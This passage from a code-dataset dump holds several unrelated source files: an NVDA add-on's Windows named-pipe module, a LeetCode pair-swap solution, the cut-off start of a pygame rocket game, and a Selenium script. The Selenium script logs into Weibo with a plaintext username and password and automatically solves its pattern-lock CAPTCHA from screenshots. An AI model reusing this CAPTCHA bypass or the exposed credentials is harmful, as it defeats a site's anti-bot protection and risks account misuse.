\"NVDA_SD-*\")\nTH32CS_SNAPPROCESS = 0x00000002\nwindll.kernel32.CreateNamedPipeW.restype = HANDLE\nwindll.kernel32.CreateNamedPipeW.argtypes = (\n\tLPCWSTR,\n\tDWORD,\n\tDWORD,\n\tDWORD,\n\tDWORD,\n\tDWORD,\n\tDWORD,\n\tPOINTER(winKernel.SECURITY_ATTRIBUTES),\n)\nwindll.kernel32.ConnectNamedPipe.restype = BOOL\nwindll.kernel32.ConnectNamedPipe.argtypes = (HANDLE, LPOVERLAPPED)\nwindll.kernel32.DisconnectNamedPipe.restype = BOOL\nwindll.kernel32.DisconnectNamedPipe.argtypes = (HANDLE,)\n\n\ndef getParentProcessId(processId: int) -> Optional[int]:\n\tFSnapshotHandle = windll.kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)\n\ttry:\n\t\tFProcessEntry32 = processEntry32W()\n\t\tFProcessEntry32.dwSize = sizeof(processEntry32W)\n\t\tContinueLoop = windll.kernel32.Process32FirstW(FSnapshotHandle, byref(FProcessEntry32))\n\t\twhile ContinueLoop:\n\t\t\tif FProcessEntry32.th32ProcessID == processId:\n\t\t\t\treturn FProcessEntry32.th32ParentProcessID\n\t\t\tContinueLoop = windll.kernel32.Process32NextW(FSnapshotHandle, byref(FProcessEntry32))\n\t\telse:\n\t\t\treturn None\n\tfinally:\n\t\twindll.kernel32.CloseHandle(FSnapshotHandle)\n\n\ndef getNamedPipes() -> Iterator[str]:\n\tyield from iglob(os.path.join(PIPE_DIRECTORY, \"*\"))\n\n\ndef getRdPipeNamedPipes() -> Iterator[str]:\n\tyield from iglob(RD_PIPE_GLOB_PATTERN)\n\n\ndef getSecureDesktopNamedPipes() -> Iterator[str]:\n\tyield from iglob(SECURE_DESKTOP_GLOB_PATTERN)\n\n\nclass PipeMode(IntFlag):\n\tREADMODE_BYTE = 0x00000000\n\tREADMODE_MESSAGE = 0x00000002\n\tWAIT = 0x00000000\n\tNOWAIT = 0x00000001\n\n\nclass PipeOpenMode(IntFlag):\n\tACCESS_DUPLEX = 0x00000003\n\tACCESS_INBOUND = 0x00000001\n\tACCESS_OUTBOUND = 0x00000002\n\tFIRST_PIPE_INSTANCE = 0x00080000\n\tWRITE_THROUGH = 0x80000000\n\tOVERLAPPED = FILE_FLAG_OVERLAPPED\n\tWRITE_DAC = 0x00040000\n\tWRITE_OWNER = 0x00080000\n\tACCESS_SYSTEM_SECURITY = 0x01000000\n\n\nMAX_PIPE_MESSAGE_SIZE = 1024 * 64\n\n\nclass NamedPipeBase(IoBase):\n\tpipeProcessId: Optional[int] = None\n\tpipeParentProcessId: Optional[int] = None\n\tpipeMode: PipeMode = PipeMode.READMODE_BYTE | PipeMode.WAIT\n\tpipeName: str\n\n\tdef __init__(\n\t\tself,\n\t\tpipeName: str,\n\t\tfileHandle: Union[HANDLE, int],\n\t\tonReceive: Callable[[bytes], None],\n\t\tonReceiveSize: int = MAX_PIPE_MESSAGE_SIZE,\n\t\tonReadError: Optional[Callable[[int], bool]] = None,\n\t\tioThread: Optional[IoThread] = None,\n\t\tpipeMode: PipeMode = PipeMode.READMODE_BYTE,\n\t):\n\t\tself.pipeName = pipeName\n\t\tself.pipeMode = pipeMode\n\t\tsuper().__init__(\n\t\t\tfileHandle,\n\t\t\tonReceive,\n\t\t\tonReceiveSize=onReceiveSize,\n\t\t\tonReadError=onReadError,\n\t\t\tioThread=ioThread,\n\t\t)\n\n\tdef _get_isAlive(self) -> bool:\n\t\treturn self.pipeName in getNamedPipes()\n\n\nclass NamedPipeServer(NamedPipeBase):\n\t_connected: bool = False\n\t_onConnected: Optional[Callable[[bool], None]] = None\n\t_waitObject: Optional[HANDLE] = None\n\t_connectOl: Optional[OVERLAPPED] = None\n\n\tdef __init__(\n\t\tself,\n\t\tpipeName: str,\n\t\tonReceive: Callable[[bytes], None],\n\t\tonReceiveSize: int = MAX_PIPE_MESSAGE_SIZE,\n\t\tonConnected: Optional[Callable[[bool], None]] = None,\n\t\tioThreadEx: Optional[IoThreadEx] = None,\n\t\tpipeMode: PipeMode = PipeMode.READMODE_BYTE,\n\t\tpipeOpenMode: PipeOpenMode = (\n\t\t\tPipeOpenMode.ACCESS_DUPLEX | PipeOpenMode.OVERLAPPED | PipeOpenMode.FIRST_PIPE_INSTANCE\n\t\t),\n\t\tmaxInstances: int = 1,\n\t):\n\t\tlog.debug(f\"Initializing named pipe: Name={pipeName}\")\n\t\tfileHandle = windll.kernel32.CreateNamedPipeW(\n\t\t\tpipeName,\n\t\t\tpipeOpenMode,\n\t\t\tpipeMode,\n\t\t\tmaxInstances,\n\t\t\tonReceiveSize,\n\t\t\tonReceiveSize,\n\t\t\t0,\n\t\t\tNone,\n\t\t)\n\t\tif fileHandle == INVALID_HANDLE_VALUE:\n\t\t\traise WinError()\n\t\tlog.debug(f\"Initialized named pipe: Name={pipeName}, handle={fileHandle}\")\n\t\tself._onConnected = onConnected\n\t\tsuper().__init__(\n\t\t\tpipeName,\n\t\t\tfileHandle,\n\t\t\tonReceive,\n\t\t\tonReadError=self._onReadError,\n\t\t\tioThread=ioThreadEx,\n\t\t\tpipeMode=pipeMode,\n\t\t)\n\n\tdef _handleConnect(self):\n\t\tself._connectOl = ol = OVERLAPPED()\n\t\tol.hEvent = self._recvEvt\n\t\tlog.debug(f\"Connecting server end of named pipe: Name={self.pipeName}\")\n\t\tconnectRes = windll.kernel32.ConnectNamedPipe(self._file, byref(ol))\n\t\terror: int = GetLastError()\n\t\tif error == ERROR_PIPE_CONNECTED:\n\t\t\tlog.debug(f\"Server end of named pipe {self.pipeName} already connected\")\n\t\t\twindll.kernel32.SetEvent(self._recvEvt)\n\t\telse:\n\t\t\tif not connectRes and error != ERROR_IO_PENDING:\n\t\t\t\tlog.error(f\"Error while calling ConnectNamedPipe for {self.pipeName}: {WinError(error)}\")\n\t\t\t\tself._ioDone(error, 0, byref(ol))\n\t\t\t\treturn\n\t\t\tlog.debug(f\"Named pipe {self.pipeName} pending client connection\")\n\t\ttry:\n\t\t\tself._ioThreadRef().waitForSingleObjectWithCallback(self._recvEvt, self._handleConnectCallback)\n\t\texcept OSError as e:\n\t\t\terror = e.winerror\n\t\t\tlog.error(\n\t\t\t\tf\"Error while calling RegisterWaitForSingleObject for {self.pipeName}: {WinError(error)}\"\n\t\t\t)\n\t\t\tself._ioDone(error, 0, byref(ol))\n\n\tdef _handleConnectCallback(self, _parameter: int, _timerOrWaitFired: bool):\n\t\tlog.debug(f\"Event set for {self.pipeName}\")\n\t\tnumberOfBytes = DWORD()\n\t\tlog.debug(f\"Getting overlapped result for {self.pipeName} after wait for event\")\n\t\tif not windll.kernel32.GetOverlappedResult(\n\t\t\tself._file, byref(self._connectOl), byref(numberOfBytes), False\n\t\t):\n\t\t\terror = GetLastError()\n\t\t\tlog.debug(f\"Error while getting overlapped result for {self.pipeName}: {WinError(error)}\")\n\t\t\tself._ioDone(error, 0, byref(self._connectOl))\n\t\t\treturn\n\t\tself._connected = True\n\t\tlog.debug(\"Succesfully connected {self.pipeName}, handling post connection logic\")\n\t\tclientProcessId = c_ulong()\n\t\tif not windll.kernel32.GetNamedPipeClientProcessId(HANDLE(self._file), byref(clientProcessId)):\n\t\t\traise WinError()\n\t\tself.pipeProcessId = clientProcessId.value\n\t\tself.pipeParentProcessId = getParentProcessId(self.pipeProcessId)\n\t\tself._initialRead()\n\t\tif self._onConnected is not None:\n\t\t\tself._onConnected(True)\n\t\tlog.debug(\"End of handleConnectCallback for {self.pipeName}\")\n\t\tself._connectOl = None\n\n\tdef _onReadError(self, error: int):\n\t\twinErr = WinError(error)\n\t\tlog.debug(f\"Read error: {winErr}\")\n\t\tif isinstance(winErr, BrokenPipeError):\n\t\t\tself.disconnect()\n\t\t\tself._initialRead()\n\t\t\treturn True\n\t\treturn False\n\n\tdef _asyncRead(self, _param: Optional[int] = None):\n\t\tif not self._connected:\n\t\t\t# _handleConnect will call _asyncRead when it is finished.\n\t\t\tself._handleConnect()\n\t\telse:\n\t\t\tsuper()._asyncRead()\n\n\tdef disconnect(self):\n\t\tif not windll.kernel32.DisconnectNamedPipe(self._file):\n\t\t\traise WinError()\n\t\tself._connected = False\n\t\tself.pipeProcessId = None\n\t\tself.pipeParentProcessId = None\n\t\tif self._onConnected:\n\t\t\tself._onConnected(False)\n\n\tdef close(self):\n\t\tsuper().close()\n\t\tif hasattr(self, \"_file\") and self._file is not INVALID_HANDLE_VALUE:\n\t\t\tself.disconnect()\n\t\t\tself._onConnected = None\n\t\t\twinKernel.closeHandle(self._file)\n\t\t\tself._file = INVALID_HANDLE_VALUE\n\n\t@property\n\tdef _ioDone(self):\n\t\treturn super()._ioDone\n\n\t@_ioDone.setter\n\tdef _ioDone(self, value):\n\t\t\"\"\"Hack, we don't want _ioDone to set itself to None.\"\"\"\n\t\tpass\n\n\nclass NamedPipeClient(NamedPipeBase):\n\tdef __init__(\n\t\tself,\n\t\tpipeName: str,\n\t\tonReceive: Callable[[bytes], None],\n\t\tonReadError: Optional[Callable[[int], bool]] = None,\n\t\tioThread: Optional[IoThread] = None,\n\t\tpipeMode: PipeMode = PipeMode.READMODE_BYTE,\n\t):\n\t\tfileHandle = CreateFile(\n\t\t\tpipeName,\n\t\t\twinKernel.GENERIC_READ | winKernel.GENERIC_WRITE,\n\t\t\t0,\n\t\t\tNone,\n\t\t\twinKernel.OPEN_EXISTING,\n\t\t\tFILE_FLAG_OVERLAPPED,\n\t\t\tNone,\n\t\t)\n\t\tif fileHandle == INVALID_HANDLE_VALUE:\n\t\t\traise WinError()\n\t\ttry:\n\t\t\tif pipeMode:\n\t\t\t\tdwPipeMode = DWORD(pipeMode)\n\t\t\t\tif not windll.kernel32.SetNamedPipeHandleState(fileHandle, byref(dwPipeMode), 0, 0):\n\t\t\t\t\traise WinError()\n\t\t\tserverProcessId = c_ulong()\n\t\t\tif not windll.kernel32.GetNamedPipeServerProcessId(HANDLE(fileHandle), byref(serverProcessId)):\n\t\t\t\traise WinError()\n\t\t\tself.pipeProcessId = serverProcessId.value\n\t\t\tself.pipeParentProcessId = getParentProcessId(self.pipeProcessId)\n\t\texcept Exception:\n\t\t\twinKernel.closeHandle(fileHandle)\n\t\t\traise\n\t\tsuper().__init__(\n\t\t\tpipeName,\n\t\t\tfileHandle,\n\t\t\tonReceive,\n\t\t\tonReadError=onReadError,\n\t\t\tioThread=ioThread,\n\t\t\tpipeMode=pipeMode,\n\t\t)\n\n\tdef close(self):\n\t\tsuper().close()\n\t\tif hasattr(self, \"_file\") and self._file is not INVALID_HANDLE_VALUE:\n\t\t\twinKernel.closeHandle(self._file)\n\t\t\tself._file = INVALID_HANDLE_VALUE\n","repo_name":"leonardder/rdAccess","sub_path":"addon/lib/namedPipe.py","file_name":"namedPipe.py","file_ext":"py","file_size_in_byte":9030,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"29647747519","text":"# -*- coding:utf-8 -*-\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.common.exceptions import TimeoutException\r\nfrom selenium.webdriver import ActionChains\r\nfrom PIL import Image\r\nfrom io import BytesIO\r\nimport time\r\n\r\nURL = 'https://passport.weibo.cn/signin/login';\r\nUSERNAME = 'htywork_3@sina.com';\r\nPASSWORD = 'htywork_3';\r\n\r\nclass weibogg():\r\n def __init__(self):\r\n chrome_options = webdriver.ChromeOptions();\r\n chrome_options.add_argument('start-maximized');\r\n self.browser = webdriver.Chrome(chrome_options=chrome_options);\r\n self.wait = WebDriverWait(self.browser, 20);\r\n \r\n def initpage(self):\r\n self.browser.get(URL);\r\n input_user = self.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, '#loginName')));\r\n input_pass = self.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, '#loginPassword')));\r\n login_btn = self.wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR, '#loginAction')));\r\n time.sleep(1);\r\n input_user.clear();\r\n input_user.send_keys(USERNAME);\r\n time.sleep(1);\r\n input_pass.clear();\r\n input_pass.send_keys(PASSWORD);\r\n time.sleep(1);\r\n login_btn.click();\r\n time.sleep(3); \r\n \r\n def get_direction_zb1(self, circles, index1, index2):\r\n x1 = circles[index1].location['x'] + circles[index1].size['width']/2;\r\n y1 = circles[index1].location['y'] + circles[index1].size['height']/2;\r\n x2 = circles[index2].location['x'] + circles[index2].size['width']/2;\r\n y2 = circles[index2].location['y'] + circles[index2].size['height']/2;\r\n cx = x1 + (x2-x1)/2;\r\n cy = y1 + (y2-y1)/2;\r\n return(cx, cy);\r\n \r\n def get_direction_zb2(self, circles, index1, index2):\r\n x1 = circles[index1].location['x'] + circles[index1].size['width']/2;\r\n y1 = circles[index1].location['y'] + circles[index1].size['height']/2;\r\n x2 = circles[index2].location['x'] + circles[index2].size['width']/2;\r\n y2 = circles[index2].location['y'] + circles[index2].size['height']/2;\r\n if x2 > x1 and y2 > y1: \r\n cx1 = x1 + (x2-x1)*0.3;\r\n cy1 = y1 + (y2-y1)*0.3;\r\n cx2 = x1 + (x2-x1)*0.5;\r\n cy2 = y1 + (y2-y1)*0.5;\r\n cx3 = x1 + (x2-x1)*0.7;\r\n cy3 = y1 + (y2-y1)*0.7;\r\n else:\r\n cx1 = x1 + (x2-x1)*0.3;\r\n cy1 = y2 + (y1-y2)*0.7;\r\n cx2 = x1 + (x2-x1)*0.5;\r\n cy2 = y2 + (y1-y2)*0.5;\r\n cx3 = x1 + (x2-x1)*0.7;\r\n cy3 = y2 + (y1-y2)*0.3;\r\n return(cx1, cy1, cx2, cy2, cx3, cy3);\r\n \r\n def get_directions_zb(self):\r\n directions = [];\r\n circles = None;\r\n while not circles:\r\n circles = self.browser.find_elements_by_css_selector('.patt-wrap .patt-circ');\r\n cx, cy = self.get_direction_zb1(circles, 0, 1);\r\n directions.append((cx, cy));\r\n cx, cy = self.get_direction_zb1(circles, 1, 3);\r\n directions.append((cx, cy));\r\n cx, cy = self.get_direction_zb1(circles, 2, 3);\r\n directions.append((cx, cy));\r\n cx, cy = self.get_direction_zb1(circles, 0, 2);\r\n directions.append((cx, cy));\r\n cx1, cy1, cx2, cy2, cx3, cy3 = self.get_direction_zb2(circles, 0, 3);\r\n directions.append((cx1, cy1));\r\n directions.append((cx2, cy2));\r\n directions.append((cx3, cy3));\r\n cx1, cy1, cx2, cy2, cx3, cy3 = self.get_direction_zb2(circles, 2, 1);\r\n directions.append((cx1, cy1));\r\n directions.append((cx2, cy2));\r\n directions.append((cx3, cy3));\r\n return directions;\r\n \r\n def get_screenshot(self):\r\n screenshot = self.browser.get_screenshot_as_png();\r\n screenshot = Image.open(BytesIO(screenshot));\r\n return screenshot;\r\n \r\n def convert_greyimg(self, image):\r\n image = image.convert('L');\r\n return image;\r\n \r\n def convert_binaryimg(self, image):\r\n threshold = 250; \r\n table = [];\r\n for i in range(256):\r\n if i < threshold:\r\n table.append(0);\r\n else:\r\n table.append(1);\r\n image = image.point(table,'1');\r\n return image;\r\n \r\n def convert_img2pixel(self, image):\r\n datas = data = [];\r\n datas = []\r\n for y in range(image.height):\r\n for x in range(image.width):\r\n rgb = image.load()[x, y];\r\n if rgb < 253:\r\n data.append(image.load()[x, y]);\r\n else:\r\n data.append(0);\r\n havedata_inline = 0;\r\n for pixel in data:\r\n if pixel > 0:\r\n havedata_inline = 1;\r\n break;\r\n if havedata_inline > 0:\r\n datas.append(list(data));\r\n data = [];\r\n return datas;\r\n \r\n def determin_direction(self, datas, type):\r\n if len(datas) > 0:\r\n if type == 1:\r\n first_greater0_col = 0;\r\n second_greater0_col = 0;\r\n data1 = datas[0];\r\n data2 = datas[1];\r\n for n in range(len(data1)):\r\n if data1[n] > 0:\r\n first_greater0_col = n;\r\n break;\r\n for n in range(len(data2)):\r\n if data2[n] > 0:\r\n second_greater0_col = n;\r\n break;\r\n if first_greater0_col == second_greater0_col:\r\n return 'l-r';\r\n else:\r\n return 'r-l';\r\n elif type == 2:\r\n rows = len(datas);\r\n columns = len(datas[0]);\r\n first_greater0_row = 0;\r\n second_greater0_row = 0;\r\n for col in range(columns):\r\n for row in range(rows):\r\n if datas[row][col] > 0:\r\n if first_greater0_row == 0:\r\n first_greater0_row = row;\r\n break;\r\n else:\r\n second_greater0_row = row;\r\n break;\r\n if first_greater0_row > 0 and second_greater0_row > 0:\r\n break;\r\n if first_greater0_row == second_greater0_row:\r\n return 't-b';\r\n else:\r\n return 'b-t';\r\n elif type == 3:\r\n zerocnt = 0;\r\n for row in range(len(datas)):\r\n for col in range(len(datas[0])):\r\n if datas[row][col] == 0:\r\n zerocnt += 1;\r\n if zerocnt <= 10:\r\n return 'noline';\r\n rows = len(datas);\r\n columns = len(datas[0]);\r\n if datas[rows-1][0] == 0 or datas[rows-1][1] == 0:\r\n return '';\r\n else:\r\n max_zeros = 0;\r\n temp_zeros = 0;\r\n for col in range(columns):\r\n for row in range(rows):\r\n if datas[row][col] == 0:\r\n temp_zeros += 1;\r\n if temp_zeros > max_zeros:\r\n max_zeros = temp_zeros;\r\n temp_zeros = 0;\r\n if max_zeros < 7:\r\n return '';\r\n else:\r\n maxlen = 6;\r\n print('31', datas);\r\n zero_array = [];\r\n times1 = 0;\r\n length = len(datas);\r\n for i in range(1,length+1):\r\n times1 += 1;\r\n zero_cnt = 0;\r\n for j in range(i):\r\n row = j;\r\n col = i-j-1;\r\n print('32', row, col, datas[row][col]);\r\n if datas[row][col] == 0:\r\n zero_cnt += 1;\r\n if zero_cnt > maxlen:\r\n zero_cnt = maxlen;\r\n zero_array.append((zero_cnt, times1));\r\n print('-'*30, times1, 'end......');\r\n times = times1;\r\n times1 = 0;\r\n for i in range(length-1,0,-1):\r\n zero_cnt = 0;\r\n for j in range(i):\r\n row = j + times1+ 1;\r\n col = (length-1) - j;\r\n print('32', row, col, datas[row][col]);\r\n if datas[row][col] == 0:\r\n zero_cnt += 1;\r\n times1 += 1;\r\n if zero_cnt > maxlen:\r\n zero_cnt = maxlen;\r\n zero_array.append((zero_cnt, times+times1));\r\n print('-'*30, times+times1, 'end......');\r\n print('33',zero_array );\r\n max_of_firt_para = 0;\r\n max_of_second_para = 0;\r\n for i in range(len(zero_array)):\r\n if zero_array[i][0] >= max_of_firt_para:\r\n max_of_firt_para = zero_array[i][0];\r\n max_of_second_para = zero_array[i][1]; \r\n after_zeronum = zero_array[max_of_second_para][0];\r\n print('34', 'max_of_firt_para', max_of_firt_para, 'max_of_second_para', max_of_second_para, 'after_zeronum', after_zeronum);\r\n print('35', 'max_of_firt_para - after_zeronum', max_of_firt_para - after_zeronum);\r\n if max_of_firt_para - after_zeronum >= 3:\r\n return 'rb-lt';\r\n else:\r\n return 'lt-rb';\r\n elif type == 4:\r\n zerocnt = 0;\r\n for row in range(len(datas)):\r\n for col in range(len(datas[0])):\r\n if datas[row][col] == 0:\r\n zerocnt += 1;\r\n if zerocnt <= 10:\r\n return 'notline';\r\n rows = len(datas);\r\n columns = len(datas[0]);\r\n if datas[0][0] == 0 or datas[1][0] == 0:\r\n return '';\r\n else:\r\n max_zeros = 0;\r\n temp_zeros = 0;\r\n for col in range(columns):\r\n for row in range(rows):\r\n if datas[row][col] == 0:\r\n temp_zeros += 1;\r\n if temp_zeros > max_zeros:\r\n max_zeros = temp_zeros;\r\n temp_zeros = 0;\r\n if max_zeros < 7:\r\n return '';\r\n else:\r\n maxlen = 6;\r\n print('41', datas);\r\n zero_array = [];\r\n times1 = 0;\r\n length = len(datas);\r\n for i in range(1,length+1):\r\n times1 += 1;\r\n zero_cnt = 0;\r\n for j in range(i):\r\n row = j;\r\n col = length-times1+j;\r\n print('42', row, col, datas[col][row]);\r\n if datas[col][row] == 0:\r\n zero_cnt += 1;\r\n print('-'*30, times1, 'end......');\r\n if zero_cnt > maxlen:\r\n zero_cnt = maxlen;\r\n zero_array.append((zero_cnt, times1));\r\n times = times1;\r\n times1 = 0;\r\n for i in range(length-1,0,-1):\r\n times1 += 1;\r\n zero_cnt = 0;\r\n for j in range(i):\r\n row = times1 + j;\r\n col = j;\r\n print('42', row, col, datas[col][row]);\r\n if datas[col][row] == 0:\r\n zero_cnt += 1;\r\n print('-'*30, times+times1, 'end......');\r\n if zero_cnt > maxlen:\r\n zero_cnt = maxlen;\r\n zero_array.append((zero_cnt, times+times1));\r\n print('43', zero_array);\r\n\r\n max_of_firt_para = 0;\r\n max_of_second_para = 0;\r\n for i in range(len(zero_array)):\r\n if zero_array[i][0] > max_of_firt_para:\r\n max_of_firt_para = zero_array[i][0];\r\n max_of_second_para = zero_array[i][1];\r\n pre_zeronum = zero_array[max_of_second_para-2][0];\r\n print('44', 'max_of_firt_para', max_of_firt_para, 'max_of_second_para', max_of_second_para, 'pre_zeronum', pre_zeronum);\r\n print('45', 'max_of_firt_para - pre_zeronum', max_of_firt_para - pre_zeronum);\r\n if max_of_firt_para - pre_zeronum >= 3:\r\n return 'lb-rt';\r\n else:\r\n return 'rt-lb';\r\n else:\r\n pass;\r\n else:\r\n return '';\r\n \r\n def detect_direction_relation(self, directions):\r\n lines_relation = [];\r\n screenshot = self.get_screenshot();\r\n\r\n img = screenshot.crop((directions[0][0]-8, directions[0][1]-8, directions[0][0]+8, directions[0][1]+8));\r\n img = self.convert_greyimg(img);\r\n datas = self.convert_img2pixel(img);\r\n direction_str = self.determin_direction(datas, 1);\r\n if direction_str == 'l-r':\r\n lines_relation.append((1, 2));\r\n if direction_str == 'r-l':\r\n lines_relation.append((2, 1));\r\n \r\n img = screenshot.crop((directions[1][0]-8, directions[1][1]-8, directions[1][0]+8, directions[1][1]+8));\r\n img = self.convert_greyimg(img);\r\n datas = self.convert_img2pixel(img);\r\n direction_str = self.determin_direction(datas, 2);\r\n if direction_str == 't-b':\r\n lines_relation.append((2, 4));\r\n if direction_str == 'b-t':\r\n lines_relation.append((4, 2));\r\n \r\n img = screenshot.crop((directions[2][0]-8, directions[2][1]-8, directions[2][0]+8, directions[2][1]+8));\r\n img = self.convert_greyimg(img);\r\n datas = self.convert_img2pixel(img);\r\n direction_str = self.determin_direction(datas, 1);\r\n if direction_str == 'l-r':\r\n lines_relation.append((3, 4));\r\n if direction_str == 'r-l':\r\n lines_relation.append((4, 3));\r\n \r\n img = screenshot.crop((directions[3][0]-8, directions[3][1]-8, directions[3][0]+8, directions[3][1]+8));\r\n img = self.convert_greyimg(img);\r\n datas = self.convert_img2pixel(img);\r\n direction_str = self.determin_direction(datas, 2);\r\n if direction_str == 't-b':\r\n lines_relation.append((1, 3));\r\n if direction_str == 'b-t':\r\n lines_relation.append((3, 1));\r\n \r\n ltrb = 0;\r\n img = screenshot.crop((directions[4][0]-8, directions[4][1]-8, directions[4][0]+8, directions[4][1]+8));\r\n img = self.convert_greyimg(img);\r\n img = self.convert_binaryimg(img);\r\n datas = self.convert_img2pixel(img);\r\n direction_str = self.determin_direction(datas, 3);\r\n if direction_str == 'noline':\r\n ltrb=1;\r\n elif direction_str == 'lt-rb':\r\n lines_relation.append((1, 4));\r\n ltrb=1;\r\n elif direction_str == 'rb-lt':\r\n lines_relation.append((4, 1));\r\n ltrb=1;\r\n \r\n if ltrb == 0:\r\n img = screenshot.crop((directions[5][0]-8, directions[5][1]-8, directions[5][0]+8, directions[5][1]+8));\r\n img = self.convert_greyimg(img);\r\n img = self.convert_binaryimg(img);\r\n datas = self.convert_img2pixel(img);\r\n direction_str = self.determin_direction(datas, 3);\r\n if direction_str == 'lt-rb':\r\n lines_relation.append((1, 4));\r\n ltrb=1;\r\n if direction_str == 'rb-lt':\r\n lines_relation.append((4, 1));\r\n ltrb=1;\r\n \r\n if ltrb == 0:\r\n img = screenshot.crop((directions[6][0]-8, directions[6][1]-8, directions[6][0]+8, directions[6][1]+8));\r\n img = self.convert_greyimg(img);\r\n img = self.convert_binaryimg(img);\r\n datas = self.convert_img2pixel(img);\r\n direction_str = self.determin_direction(datas, 3);\r\n if direction_str == 'lt-rb':\r\n lines_relation.append((1, 4));\r\n ltrb=1;\r\n if direction_str == 'rb-lt':\r\n lines_relation.append((4, 1));\r\n ltrb=1;\r\n \r\n lbrt = 0;\r\n img = screenshot.crop((directions[7][0]-8, directions[7][1]-8, directions[7][0]+8, directions[7][1]+8));\r\n img = self.convert_greyimg(img);\r\n img = self.convert_binaryimg(img);\r\n datas = self.convert_img2pixel(img);\r\n direction_str = self.determin_direction(datas, 4);\r\n if direction_str == 'noline':\r\n lbrt=1;\r\n elif direction_str == 'lb-rt':\r\n lines_relation.append((3, 2));\r\n lbrt=1;\r\n elif direction_str == 'rt-lb':\r\n lines_relation.append((2, 3));\r\n lbrt=1;\r\n \r\n if lbrt == 0:\r\n img = screenshot.crop((directions[8][0]-8, directions[8][1]-8, directions[8][0]+8, directions[8][1]+8));\r\n img = self.convert_greyimg(img);\r\n img = self.convert_binaryimg(img);\r\n datas = self.convert_img2pixel(img);\r\n direction_str = self.determin_direction(datas, 4);\r\n if direction_str == 'lb-rt':\r\n lines_relation.append((3, 2));\r\n lbrt=1;\r\n if direction_str == 'rt-lb':\r\n lines_relation.append((2, 3));\r\n lbrt=1;\r\n \r\n if lbrt == 0:\r\n img = screenshot.crop((directions[9][0]-8, directions[9][1]-8, directions[9][0]+8, directions[9][1]+8));\r\n img = self.convert_greyimg(img);\r\n img = self.convert_binaryimg(img);\r\n datas = self.convert_img2pixel(img);\r\n direction_str = self.determin_direction(datas, 4);\r\n if direction_str == 'lb-rt':\r\n lines_relation.append((3, 2));\r\n lbrt=1;\r\n if direction_str == 'rt-lb':\r\n lines_relation.append((2, 3));\r\n lbrt=1;\r\n \r\n return lines_relation;\r\n \r\n def get_lines_link(self, lines_relation):\r\n for item1 in lines_relation:\r\n for item2 in lines_relation:\r\n for item3 in lines_relation:\r\n if item1[1] == item2[0] and item2[1] == item3[0]:\r\n link_order = str(item1[0]) + str(item1[1]) + str(item2[1]) + str(item3[1]);\r\n link_order = [int(num) for num in list(link_order)];\r\n break;\r\n return link_order;\r\n \r\n def move(self, link_order):\r\n step = 30;\r\n dx = dy = 0;\r\n circles = self.browser.find_elements_by_css_selector('.patt-wrap .patt-circ');\r\n for index in range(4):\r\n circle = circles[link_order[index]-1];\r\n if index == 0:\r\n ActionChains(self.browser).move_to_element_with_offset(circle, circle.size['width']/2, circle.size['height']/2) \\\r\n .click_and_hold().perform();\r\n else:\r\n for i in range(step):\r\n ActionChains(self.browser).move_by_offset(dx/step, dy/step).perform();\r\n time.sleep(1/step);\r\n if index == 3:\r\n ActionChains(self.browser).release().perform();\r\n else:\r\n dx = circles[link_order[index+1]-1].location['x'] - circle.location['x'];\r\n dy = circles[link_order[index+1]-1].location['y'] - circle.location['y'];\r\n \r\ndef main():\r\n gg = weibogg();\r\n gg.initpage();\r\n directions = gg.get_directions_zb();\r\n lines_relation = gg.detect_direction_relation(directions);\r\n link_order = gg.get_lines_link(lines_relation);\r\n print(link_order);\r\n gg.move(link_order);\r\n\r\nif __name__ == '__main__':\r\n main();\r\n","repo_name":"chen222246lei/webspider","sub_path":"gongge.py","file_name":"gongge.py","file_ext":"py","file_size_in_byte":21466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3936477438","text":"# https://leetcode-cn.com/problems/swap-nodes-in-pairs/\nfrom typing import List\n# Definition for singly-linked list.\n\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution1:\n # 方法一:递归\n # 时间复杂度:O(n),空间复杂度:O(n)\n def swapPairs(self, head: ListNode) -> ListNode:\n if not head or not head.next:\n return head\n newhead = head.next\n head.next = self.swapPairs(newhead.next)\n newhead.next = head\n return newhead\n\n\nclass Solution:\n # 方法二:迭代\n # 时间复杂度:O(n),空间复杂度:O(1)\n def swapPairs(self, head: ListNode) -> ListNode:\n dummyHead = ListNode(0)\n dummyHead.next = head\n temp = dummyHead\n while(temp.next and temp.next.next):\n node1 = temp.next\n node2 = temp.next.next\n temp.next = node2\n node1.next = node2.next\n node2.next = node1\n temp = node1\n return dummyHead.next\n\n\ntest = ListNode()\nhead = test\nfor i in range(1, 5):\n node = ListNode(i)\n head.next = node\n head = head.next\nS = Solution()\nnew_list = S.swapPairs(test)\nnewhead = new_list\nwhile(newhead):\n print(newhead.val)\n newhead = newhead.next\n","repo_name":"wenjiaaa/Leetcode","sub_path":"P0001_P0500/0024-swap-nodes-in-pairs.py","file_name":"0024-swap-nodes-in-pairs.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"8342568138","text":"import pygame\nimport os\nimport math\n\n'''\n up: vel=neg acc=neg\n down: vel=pos acc=pos\n\n'''\n\n\n# window and refresh rate\nWIDTH, HEIGHT = 900, 1000\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\nFPS = 60\n#rocket initial position\nROCKET_X = 450\nROCKET_Y = 25\nROCKET_POS =(ROCKET_X, ROCKET_Y)\nROCKET_WIDTH = 50\nROCKET_HEIGHT = 90\n# rocket image \nROCKET_IMG = pygame.image.load(os.path.join('assets', 'rocket.png'))\nROCKET = pygame.transform.scale(ROCKET_IMG, (ROCKET_WIDTH, ROCKET_HEIGHT))\n#window background\nbackground = ('#9dedbf')\n\n\nclass Rocket:\n def __init__(self, rocket_img, pos, width, height):\n self.img = rocket_img\n self.pos = pos\n self.x = pos[0]\n self.y = pos[1]\n self.width = width\n self.height = height\n self.rocket_rect = pygame.Rect(self.x, self.y, self.width, self.height)\n 